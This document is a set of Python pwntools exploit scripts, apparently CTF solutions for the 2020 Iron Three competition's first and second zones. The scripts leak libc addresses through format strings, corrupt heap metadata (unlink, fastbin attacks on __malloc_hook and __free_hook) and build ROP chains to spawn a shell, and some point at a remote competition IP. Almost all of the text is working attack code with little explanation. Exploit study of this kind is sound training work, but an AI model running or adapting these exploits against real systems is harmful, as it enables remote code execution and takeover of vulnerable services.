2020 铁三 第一、二赛区



第一赛区

1.hacknote

#!/usr/bin/python
#coding:utf-8
from pwn import *
context.log_level = 'debug'
context.update(arch='amd64', os='linux', timeout=1)
# Symbols are resolved against the libc bundled with the challenge.
libc = ELF("./libc-2.23.so")
# `python exp.py Q` targets the remote service; otherwise run the local binary.
io = remote("172.20.13.39", '10001') if args.Q else process("./hacknote")
def name(name):
	"""Answer the "name!" prompt with *name* (a newline is appended)."""
	prompt = "name!\n"
	io.sendlineafter(prompt, name)
def add(sz, ct='a'):
	"""Menu option 1: create a note of size *sz* containing *ct*.

	The size is sent as a line; *ct* is sent raw with no trailing newline.
	"""
	for prompt, reply in (("choice :", '1'), ("size :", str(sz))):
		io.sendlineafter(prompt, reply)
	io.sendafter("Content :", ct)
def dele(idx):
	"""Menu option 2: delete the note at index *idx*."""
	replies = (("choice :", '2'), ("Index :", str(idx)))
	for prompt, reply in replies:
		io.sendlineafter(prompt, reply)
def show(idx):
	"""Menu option 3: print the note at index *idx*."""
	replies = (("choice :", '3'), ("Index :", str(idx)))
	for prompt, reply in replies:
		io.sendlineafter(prompt, reply)
def main():
	"""Drive the hacknote challenge end to end; the call order is load-bearing.

	The name prompt is answered with ``%13$p`` and the pointer printed back is
	used to derive ``libc_base``.  The constants below (256, 0x45216) are tied
	to the bundled libc-2.23.so and will not transfer to another libc.
	"""
#0x0000555555554000
	#gdb.attach(io,'b *0x0000555555554000+0xa78')
	name("%13$p")
	io.recvuntil("hello ,")
	# recv(14) reads "0x" + 12 hex digits; 256 is the assumed distance between
	# the leaked value and __libc_start_main — verify for the target libc.
	libc_base=int(io.recv(14),16)-libc.sym["__libc_start_main"]-256
	log.success("libc_base==>"+hex(libc_base))
	# Fixed allocate/free sequence the rest of the script depends on; do not reorder.
	add(0x20)
	add(0x20)
	dele(0)
	dele(1)
	# 0x45216 is a hard-coded libc-2.23 offset.
	add(0x10,p64(libc_base+0x45216+0x10))
	# NOTE(review): this gdb.attach is unguarded and also runs under args.Q
	# (remote target); gate it on `not args.Q` like the commented one above.
	gdb.attach(io,'b *{}'.format(libc_base+libc.sym['system']))
	show(0)
	io.interactive()
if __name__=='__main__':
	# Run the exploit only when executed as a script, not on import.
	main()

2.note

#!/usr/bin/python
#coding:utf-8
from pwn import *
context.log_level = 'debug'
context.update(arch='amd64', os='linux', timeout=1)
# Presumably the load address seen under gdb; only referenced by the
# commented-out breakpoint in main().
base = 0x0000555555554000
# Symbols are resolved against the host's libc, not a bundled one.
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
# `python exp.py Q` targets the remote service; otherwise run the local binary.
io = remote("172.20.13.39", '10002') if args.Q else process("./heap")
def name(name):
	"""Answer the "name: " prompt with *name* (a newline is appended)."""
	prompt = "name: "
	io.sendlineafter(prompt, name)
def add(sz):
	"""Menu option 1: allocate an item of *sz* bytes."""
	steps = (("choice: ", '1'), ("item: ", str(sz)))
	for prompt, reply in steps:
		io.sendlineafter(prompt, reply)
def show(idx):
	"""Menu option 2: print item *idx*."""
	steps = (("choice: ", '2'), ("item: ", str(idx)))
	for prompt, reply in steps:
		io.sendlineafter(prompt, reply)
def edit(idx, ct):
	"""Menu option 3: overwrite item *idx* with *ct* (sent as a line)."""
	steps = (("choice: ", '3'), ("item: ", str(idx)), ("data: ", ct))
	for prompt, reply in steps:
		io.sendlineafter(prompt, reply)
def dele(idx):
	"""Menu option 4: free item *idx*."""
	steps = (("choice: ", '4'), ("item: ", str(idx)))
	for prompt, reply in steps:
		io.sendlineafter(prompt, reply)
def main():
	"""Drive the note challenge (first variant); the call order is load-bearing.

	The name prompt is answered with ``%19$p-%15$p``; the two pointers printed
	back yield ``libc_base`` and ``text_base``.  All offsets below (240, 0xee1,
	0x2020c0, the one_gadget list) are specific to the host libc and this binary.
	"""
	#gdb.attach(io,'b *{}'.format(base+0xb5e))
	name("%19$p-%15$p")
	io.recvuntil("Hello, ")
	# 240 is the assumed distance between the first leaked value and
	# __libc_start_main — verify for the libc in use.
	libc_base=int(io.recv(14),16)-240-libc.sym["__libc_start_main"]
	io.recvuntil("-")
	# 0xee1 is the binary-specific offset of the second leaked pointer.
	text_base=int(io.recv(14),16)-0xee1
	# Computed but never used below.
	one_gadget=libc_base+[0x45216,0x4526d,0xf0274,0xf1117][0]
	log.success("libc_base==>"+hex(libc_base))
	log.success("text_base==>"+hex(text_base))
	add(0x70)#0
	add(0x90)#1
	add(0x20)#2
	dele(0)
	# Payload layout is tied to the chunk sizes chosen above (0x70/0x90) and to
	# text_base+0x2020c0; do not reorder or resize.
	edit(0,(p64(0)+p64(0x70)+p64(text_base+0x2020c0-0x18)+p64(text_base+0x2020c0-0x10)).ljust(0x70,'\x00')+p64(0x70)+p64(0xa0))
	dele(1)
	edit(0,p64(0)*3+p64(libc_base+libc.sym["__free_hook"]))
	edit(0,p64(libc_base+libc.sym["system"]))
	edit(2,'/bin/sh\x00')
	# Final dele(2) is the trigger.
	dele(2)
	#dele(2)
	#gdb.attach(io)
	io.interactive()
if __name__=='__main__':
	# Run the exploit only when executed as a script, not on import.
	main()
#!/usr/bin/python
#coding:utf-8
from pwn import *
context.log_level = 'debug'
context.update(arch='amd64', os='linux', timeout=1)
# Presumably the load address seen under gdb; only referenced by the
# commented-out breakpoint in main().
base = 0x0000555555554000
# Symbols are resolved against the host's libc, not a bundled one.
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
# `python exp.py Q` targets the remote service; otherwise run the local binary.
io = remote("172.20.13.39", '10002') if args.Q else process("./heap")
def name(name):
	"""Answer the "name: " prompt with *name* (a newline is appended)."""
	prompt = "name: "
	io.sendlineafter(prompt, name)
def add(sz):
	"""Menu option 1: allocate an item of *sz* bytes."""
	for prompt, reply in (("choice: ", '1'), ("item: ", str(sz))):
		io.sendlineafter(prompt, reply)
def show(idx):
	"""Menu option 2: print item *idx*."""
	for prompt, reply in (("choice: ", '2'), ("item: ", str(idx))):
		io.sendlineafter(prompt, reply)
def edit(idx, ct):
	"""Menu option 3: overwrite item *idx* with *ct* (sent as a line)."""
	for prompt, reply in (("choice: ", '3'), ("item: ", str(idx)), ("data: ", ct)):
		io.sendlineafter(prompt, reply)
def dele(idx):
	"""Menu option 4: free item *idx*."""
	for prompt, reply in (("choice: ", '4'), ("item: ", str(idx))):
		io.sendlineafter(prompt, reply)
def main():
	"""Drive the note challenge (second variant); the call order is load-bearing.

	The name prompt is answered with ``%19$p`` to derive ``libc_base``; the
	one_gadget list, the 0x23 and 13 adjustments and the 240 distance are all
	specific to the host libc and must be re-derived for any other build.
	"""
	#gdb.attach(io,'b *{}'.format(base+0xb5e))
	name("%19$p")
	io.recvuntil("Hello, ")
	# 240 is the assumed distance between the leaked value and
	# __libc_start_main — verify for the libc in use.
	libc_base=int(io.recv(14),16)-240-libc.sym["__libc_start_main"]
	# NOTE: the second entry (0x4526b) differs from the list used in the
	# previous script (0x4526d); confirm which matches the libc actually loaded.
	one_gadget=libc_base+[0x45216,0x4526b,0xf0274,0xf1117][1]
	log.success("libc_base==>"+hex(libc_base))
	add(0x60)
	dele(0)
	# 0x23 is a libc-2.23-era layout offset — confirm against the target libc.
	edit(0,p64(libc_base+libc.sym["__malloc_hook"]-0x23))
	log.success("malloc_hook==>"+hex(libc_base+libc.sym["__malloc_hook"]))
	add(0x60)
	add(0x60)
	edit(2,"a"*11+p64(one_gadget)+p64(libc_base+libc.sym["__libc_realloc"]+13))
	log.success("libc_base==>"+hex(libc_base))
	# NOTE: the "system==>" label is misleading — the value logged is one_gadget.
	log.success("system==>"+hex(one_gadget))
	log.success("malloc_hook==>"+hex(libc_base+libc.sym["__malloc_hook"]))
	#gdb.attach(io,'b *{}'.format(one_gadget))
	# Final add(0x20) is the trigger.
	add(0x20)
	io.interactive()
if __name__=='__main__':
	# Run the exploit only when executed as a script, not on import.
	main()

第二赛区

1.note

#!/usr/bin/python
#coding:utf-8

from pwn import *
context.update(arch='amd64',os='linux',timeout=1)
context.log_level='debug'
# Symbols are resolved against the host's libc, not a bundled one.
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
if args.Q:
	# NOTE(review): remote() is called with no host/port, so `Q` mode raises
	# TypeError before anything runs; the target was never filled in here.
	io=remote()
else:
	io=process("./pwn")
	
def add(sz, title='a', ct='a'):
	"""Menu option 1: create a note of *sz* bytes with the given title and content.

	Every field, including the content, is sent as a line.
	"""
	steps = (
		("Choice:", '1'),
		("size: ", str(sz)),
		("title: ", title),
		("content: ", ct),
	)
	for prompt, reply in steps:
		io.sendlineafter(prompt, reply)
def dele(idx):
	"""Menu option 2: delete the note at index *idx*."""
	steps = (("Choice:", '2'), ("delete: ", str(idx)))
	for prompt, reply in steps:
		io.sendlineafter(prompt, reply)
def show(idx):
	"""Menu option 3: print the note at index *idx*."""
	steps = (("Choice:", '3'), ("show: ", str(idx)))
	for prompt, reply in steps:
		io.sendlineafter(prompt, reply)

def main():
	"""Drive the second-zone note challenge; the call order is load-bearing.

	A libc pointer is read back from ``show(0)`` after a fixed create/delete
	sequence; the constants 0x3c4b78, 0x23, 0x13 and the one_gadget list are
	specific to the host libc and this binary.
	"""
	add(0x20)
	add(0x90)
	add(0x20)
	dele(1)
	dele(0)
	# Title is 0x11 bytes: 16 filler bytes plus a single 0x40.
	add(0x20,'a'*0x10+'\x40')
	show(0)
	# Takes the last 6 bytes up to and including the first 0x7f byte as a
	# little-endian pointer; 0x3c4b78 is a libc-specific constant — confirm.
	libc_base=u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x3c4b78
	ogg=libc_base+[0x45216,0x4526a,0xf02a4,0xf1147][2]
	log.success("libc_base==>"+hex(libc_base))
	malloc_hook=libc_base+libc.sym["__malloc_hook"]
	add(0x90)
	add(0x20)
	add(0x60)
	add(0x60)#5
	dele(4)
	dele(3)
	add(0x20,'a'*0x10+'\x40')#3
	dele(5)
	dele(3)
	add(0x60,'a',p64(malloc_hook-0x23))#6
	add(0x60)
	add(0x60)
	add(0x60,'a','a'*0x13+p64(ogg))
	# Final allocation is issued by hand rather than via add(); presumably the
	# script does not expect the title/content prompts to follow — confirm.
	io.sendlineafter("Choice:",'1')
	io.sendlineafter("size: ",'20')
	#dele(0)
	#gdb.attach(io)
	io.interactive()
if __name__=='__main__':
	# Run the exploit only when executed as a script, not on import.
	main()

2.stackstorm

#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='amd64',os='linux',timeout=1)
context.log_level='debug'
elf=ELF("./pwn")
# Symbols are resolved against the libc bundled with the challenge.
libc=ELF("./libc-2.23.so")
if args.Q:
	# NOTE(review): remote() is called with no host/port, so `Q` mode raises
	# TypeError before anything runs; the target was never filled in here.
	io=remote()
else:
	io=process("./pwn")
# Hard-coded gadget addresses for ./pwn (they look like a fixed 0x400000 image
# rather than a PIE one — confirm); they must be re-derived for any other build.
leave_r=0x00000000004007c1
main_addr=0x4007c3
pop_rdi=0x0000000000400903
pop_rsi_r15=0x0000000000400901
puts_plt=elf.sym["puts"]
puts_got=elf.got['puts']


def send(p1, p2):
	"""Answer the two data prompts: *p1* as a line, *p2* raw (no newline)."""
	io.sendlineafter("data1:\n", p1)
	raw_prompt = "data2:\n"
	io.sendafter(raw_prompt, p2)
def main():
	"""Drive the stackstorm challenge in two rounds; the order is load-bearing.

	Each round first sends a 0x70-byte filler and reads a stack pointer back,
	then sends a chain padded to 0x70 bytes followed by two pointers that
	depend on that leak.  Offsets (0x98, 0x10, 0xc0) and the one_gadget list
	are tied to this binary and the bundled libc-2.23.so.
	"""
	p1='1'
	p2='a'*0x70
	#pause()
	send(p1,p2)
	# Last 6 bytes up to and including the first 0x7f byte, as a little-endian pointer.
	leak_bp=u64(io.recvuntil("\x7f")[-6:].ljust(8,'\x00'))
	log.success("leak_bp==>"+hex(leak_bp))
	p1='1'
	# Round 1 chain: puts(puts@got) then back to main_addr.
	p2=(p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)).ljust(0x70,'a')+p64(leak_bp-0x98)+p64(leave_r)
	send(p1,p2)
	puts_leak=u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
	
	log.success("puts_leak==>"+hex(puts_leak))
	# The extra -0x10 / +0x10 adjustments are unexplained here — confirm
	# against the bundled libc before reusing.
	libc_base=puts_leak-libc.sym['puts']-0x10
	log.success("libc_base==>"+hex(libc_base))
	# Computed but never used below.
	ogg=libc_base+[0x45216,0x4526a,0xf02a4,0xf1147][3]
	system=libc_base+libc.sym["system"]+0x10
	# Python 2 iterator API (`.next()`); under Python 3 this would be next(...).
	binsh=libc_base+libc.search("/bin/sh").next()
	p1='1'
	p2='a'*0x70
	#pause()
	#gdb.attach(io,'b *{}'.format(0x4007c1))
	send(p1,p2)
	# Second leak: main was re-entered, so the previous leak_bp is stale.
	leak_bp=u64(io.recvuntil("\x7f")[-6:].ljust(8,'\x00'))
	log.success("leak_bp==>"+hex(leak_bp))
	p1='1'
	# Round 2 chain: system(binsh+0xc0); the +0xc0 is unexplained — confirm.
	p2=(p64(pop_rdi)+p64(binsh+0xc0)+p64(system)).ljust(0x70,'a')+p64(leak_bp-0x98)+p64(leave_r)
	#gdb.attach(io,'b *{}'.format(0x4007af))
	send(p1,p2)
	#send(p1,p2)
	io.interactive()
if __name__=='__main__':
	# Run the exploit only when executed as a script, not on import.
	main()